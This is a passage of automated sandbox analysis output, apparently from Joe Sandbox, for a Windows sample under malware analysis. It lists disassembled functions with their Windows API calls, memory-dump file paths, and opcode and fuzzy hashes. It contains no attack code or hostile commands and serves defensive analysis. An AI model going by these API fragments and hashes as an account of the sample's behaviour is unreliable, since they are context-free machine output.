_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 01014038
__isleadbyte_l.LIBCMT ref: 01014066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 01014094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 010140CA

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 404be3b7ec5c4b7999ab426dbd8970dd76eac76f8bde7f9b8e8bbb612d772438
Instruction ID: c217db17d5f05f9779482e83fe50b5f1c016f1c3ece943ecc2a268fdcfcbdf02
Opcode Fuzzy Hash: 404be3b7ec5c4b7999ab426dbd8970dd76eac76f8bde7f9b8e8bbb612d772438
Instruction Fuzzy Hash: 1A31CF30600206EFEB239F6AC844BAA7FE5BF40310F158468F5A5DB0A4E739D890CB90

Function 01047CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 01047CB9

Part of subcall function 01025F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 01025F6F
Part of subcall function 01025F55: GetCurrentThreadId.KERNEL32 ref: 01025F76
Part of subcall function 01025F55: AttachThreadInput.USER32(00000000,?,0102781F), ref: 01025F7D

GetCaretPos.USER32(?), ref: 01047CCA
ClientToScreen.USER32(00000000,?), ref: 01047D03
GetForegroundWindow.USER32 ref: 01047D09

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: fc9e806975f24a2a2d6251646adde364575a3103a155c9314d75c2e201148742
Instruction ID: 586892c2a780ca5de4b5f067ddbb7bbb95f103e6daca54a3a93cbbcc06e94d99
Opcode Fuzzy Hash: fc9e806975f24a2a2d6251646adde364575a3103a155c9314d75c2e201148742
Instruction Fuzzy Hash: 26314F72900108AFDB10EFA9CC819FFBBFDEF54310B11846AE955E3211EB359E019BA0

Function 0104F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00FFB35F

GetCursorPos.USER32(?), ref: 0104F211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0105E4C0,?,?,?,?,?), ref: 0104F226
GetCursorPos.USER32(?), ref: 0104F270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0105E4C0,?,?,?), ref: 0104F2A6

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 6303a9dc1b081978287c636e2e43d9111fa8a61709a11d9bc112874b08af3326
Instruction ID: 5aafc2d6bf8ab36dd2ec2c3b8037ef5ea67d3bf7542be50af8937017fcd413af
Opcode Fuzzy Hash: 6303a9dc1b081978287c636e2e43d9111fa8a61709a11d9bc112874b08af3326
Instruction Fuzzy Hash: 8821B1B9600028EFDB258F9CC898EFE7FB5EF09310F4840A9FA85872A5D3759950DB50

Function 0103431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01034358

Part of subcall function 010343E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01034401
Part of subcall function 010343E2: InternetCloseHandle.WININET(00000000), ref: 0103449E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 3a9b1dae0b23b320b9ab5e8dfdc370d2a3f188834bbb4f58047916c4cf87a419
Instruction ID: d349a6e11e86f91f4f0ce9e3b9a171e9f33ac9db3c938888cefc986347778007
Opcode Fuzzy Hash: 3a9b1dae0b23b320b9ab5e8dfdc370d2a3f188834bbb4f58047916c4cf87a419
Instruction Fuzzy Hash: F421D431204601BBEB119F649C00FBBBBEDFF85710F00801AFAD5DB550E77694209B90

Function 01048A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 01048AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 01048AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 01048ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01048ADC

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: a9f7f74d601221a14b0c08cc790905326b7c325f1bad4b6cfc4a9ec92585d769
Instruction ID: 44a73748fc980683d141eae1d2af673b4d30d69d3463de1a921554dbce7dea75
Opcode Fuzzy Hash: a9f7f74d601221a14b0c08cc790905326b7c325f1bad4b6cfc4a9ec92585d769
Instruction Fuzzy Hash: A411D031345111AFE754AB68CC45FBE7798BF85320F188529F996C72E1CBA9AC108790

Function 01038A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 01038AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 01038AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 01038AFF
WSAGetLastError.WSOCK32(00000000), ref: 01038B16

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 88f09a3dc853c2dac88387a59b5ee0404b4296cc6ab6820a81eaf84a1aff3aaa
Instruction ID: 9dfdeccc43dbf7fd4925bed28cbf3472ec51e2879671425e9f72fec00a6fb673
Opcode Fuzzy Hash: 88f09a3dc853c2dac88387a59b5ee0404b4296cc6ab6820a81eaf84a1aff3aaa
Instruction Fuzzy Hash: 8D21A871A001249FC7659F69CC84A9E7BFCEF49310F0081AAF989D7390DB78D9418F90

Function 01020AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 01021E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,01020ABB,?,?,?,0102187A,00000000,000000EF,00000119,?,?), ref: 01021E77
Part of subcall function 01021E68: lstrcpyW.KERNEL32(00000000,?,?,01020ABB,?,?,?,0102187A,00000000,000000EF,00000119,?,?,00000000), ref: 01021E9D
Part of subcall function 01021E68: lstrcmpiW.KERNEL32(00000000,?,01020ABB,?,?,?,0102187A,00000000,000000EF,00000119,?,?), ref: 01021ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0102187A,00000000,000000EF,00000119,?,?,00000000), ref: 01020AD4
lstrcpyW.KERNEL32(00000000,?,?,0102187A,00000000,000000EF,00000119,?,?,00000000), ref: 01020AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,0102187A,00000000,000000EF,00000119,?,?,00000000), ref: 01020B2E

Strings

cdecl, xrefs: 01020B25

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 1610654742f7d73c50484303a3e31eadc0e8157730625eceeba4d0b4cd80bd45
Instruction ID: 27d39aa84469a4f5a8fb3640bdfda89d6d9a948191f6623a01733ad7f821f476
Opcode Fuzzy Hash: 1610654742f7d73c50484303a3e31eadc0e8157730625eceeba4d0b4cd80bd45
Instruction Fuzzy Hash: 5F11D636200315AFDB369F64DC05D7A77A8FF49314B80406AF986CB254EB719440C7A0

Function 01012F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 01012FB5

Part of subcall function 0100395C: __FF_MSGBANNER.LIBCMT ref: 01003973
Part of subcall function 0100395C: __NMSG_WRITE.LIBCMT ref: 0100397A
Part of subcall function 0100395C: RtlAllocateHeap.NTDLL(00A40000,00000000,00000001,00000001,00000000,?,?,00FFF507,?,0000000E), ref: 0100399F

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 77fcecec993805fc90cb94299b291832aa47bc5a4e1b58e28a21c26d5e20d51a
Instruction ID: 41ed9da46462073628af0a1dbbbd6cc8e968bf1780519169713fe27f7f0668c1
Opcode Fuzzy Hash: 77fcecec993805fc90cb94299b291832aa47bc5a4e1b58e28a21c26d5e20d51a
Instruction Fuzzy Hash: 6E11AB3150561B9BEB373B74A814A993BD4BF14370F20496DF9C99E198DB3DC4408790

Function 00FFEB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FFEBB2

Part of subcall function 00FE51AF: _memset.LIBCMT ref: 00FE522F
Part of subcall function 00FE51AF: _wcscpy.LIBCMT ref: 00FE5283
Part of subcall function 00FE51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FE5293

KillTimer.USER32(?,00000001,?,?), ref: 00FFEC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FFEC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 01053C88

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: c3836adac232149544498b3b44418d563a5d9d07af9c7c6e4ea9256074edd7de
Instruction ID: 8be4d3b819efda29beaf81b9f173a2307256d74610196c0ffc2533eaeba55055
Opcode Fuzzy Hash: c3836adac232149544498b3b44418d563a5d9d07af9c7c6e4ea9256074edd7de
Instruction Fuzzy Hash: 3521DA719047889FE7739B288855BEBBFECAF05318F04048DE7CA5A255C7B52984CB51

Function 0102058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 010205AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 010205C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 010205DD
FreeLibrary.KERNEL32(?), ref: 01020632

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: a08e40979f08bcbe9aa31a61e72e7aa4502737f829734294325a451b35653f32
Instruction ID: 7321b5b583ecea61189ae23af03da51793824edcfa437b8b14be80c847fa7cfb
Opcode Fuzzy Hash: a08e40979f08bcbe9aa31a61e72e7aa4502737f829734294325a451b35653f32
Instruction Fuzzy Hash: 17218171A00329EFEB308F95D88CADBBBB8EF44700F1084A9F69696054D776EA45DF50

Function 0101B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0101AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0101AA79
Part of subcall function 0101AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0101AA83
Part of subcall function 0101AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0101AA92
Part of subcall function 0101AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0101AA99
Part of subcall function 0101AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0101AAAF

GetLengthSid.ADVAPI32(?,00000000,0101ADE4,?,?), ref: 0101B21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0101B227
HeapAlloc.KERNEL32(00000000), ref: 0101B22E
CopySid.ADVAPI32(?,00000000,?), ref: 0101B247

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: bf58d3850c1112aa65bebdbeb96d38e117cf7e13575b1f71d206c383cc01e5cc
Instruction ID: 76633b94e32b6a66d26b43b7bdcd9fd14f1dc2a15dd6d891688bca16d86d7bfb
Opcode Fuzzy Hash: bf58d3850c1112aa65bebdbeb96d38e117cf7e13575b1f71d206c383cc01e5cc
Instruction Fuzzy Hash: BD119471A00205FFDB249F98DD84AEEBBF9EF85214F14806DE5C297214D779AE48CB10

Function 0101B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 0101B498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0101B4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0101B4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0101B4DB

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: af6db4562352f3bcc16268d008fad846ac032c89c9f1423f6d5a933dee267b3c
Instruction ID: 5ee9efac45d7d7dc47550082b86961ce0c332358bb126b16b6710b3f64cb827b
Opcode Fuzzy Hash: af6db4562352f3bcc16268d008fad846ac032c89c9f1423f6d5a933dee267b3c
Instruction Fuzzy Hash: 6A115A7A940218FFEB11DFA9C881E9DBBB4FB08700F208091E604B7294DB75AE10DB94

Function 00FFB55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00FFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00FFB35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00FFB5A5
GetClientRect.USER32(?,?), ref: 0105E69A
GetCursorPos.USER32(?), ref: 0105E6A4
ScreenToClient.USER32(?,?), ref: 0105E6AF

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 13b0c8c8fd33e920c90e20c33ecbba4ab886691b4d5e3daf29e1b980651c1749
Instruction ID: a7e3507e68d2753a9b88d5688172a5d8c356e76abd59b2c9777bdf88ee95695a
Opcode Fuzzy Hash: 13b0c8c8fd33e920c90e20c33ecbba4ab886691b4d5e3daf29e1b980651c1749
Instruction Fuzzy Hash: 5A111C71A0002ABFDF10DF98D8859FE77B9EF09304F580455FA82E7154D738AA91DBA1

Function 0102732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 01027352
MessageBoxW.USER32(?,?,?,?), ref: 01027385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0102739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 010273A2

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 4caf481db96fb3df3b3b5a4e1e6a7b7cbb61f685251a36b768f1f85d0aabb86d
Instruction ID: 8b08153d28ea9b6d5544583018ba20833bc41eb9bb1dfcf73c3ebf41b6cad3ba
Opcode Fuzzy Hash: 4caf481db96fb3df3b3b5a4e1e6a7b7cbb61f685251a36b768f1f85d0aabb86d
Instruction Fuzzy Hash: 10110472A04214BFD7129BACDC0AADE7FFDAB59220F048355F9A1D3295D675891087A0

Function 00FFD17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FFD1BA
GetStockObject.GDI32(00000011), ref: 00FFD1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 00FFD1D8

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 99bff423e8a937c45d8bc4eff8cc0edbbd1fc579207f85141aa65d2a0d5f06de
Instruction ID: a36d7076b677aa3ef864283d56b628b37d9c527e87e69fe40e3cc50897685c47
Opcode Fuzzy Hash: 99bff423e8a937c45d8bc4eff8cc0edbbd1fc579207f85141aa65d2a0d5f06de
Instruction Fuzzy Hash: 2711ADB260154DBFEB124F90DC50EFABB6AFF08368F040211FB8452060D7369D60ABA0

Function 01014DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 01014E16

Part of subcall function 010154F5: __fltout2.LIBCMT ref: 0101551E

__cftog_l.LIBCMT ref: 01014E3C
__cftoe_l.LIBCMT ref: 01014E6E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: e2d1c8001d44c7070397e15205b9e0cc33ff8ead034a5d1d0fc9834857032355
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 6F014C3600414EBBCF525E88DC11CEE3FA7BB19355B488555FEA899038D33AC6B1AB81

Function 01007452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01007A0D: __getptd_noexit.LIBCMT ref: 01007A0E

__lock.LIBCMT ref: 0100748F
InterlockedDecrement.KERNEL32(?), ref: 010074AC
_free.LIBCMT ref: 010074BF
InterlockedIncrement.KERNEL32(00A66078), ref: 010074D7

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: ca7b3489809a6b6da75d4527292edf96108f2c5ba2b7d4b897dcfa2af23942e4
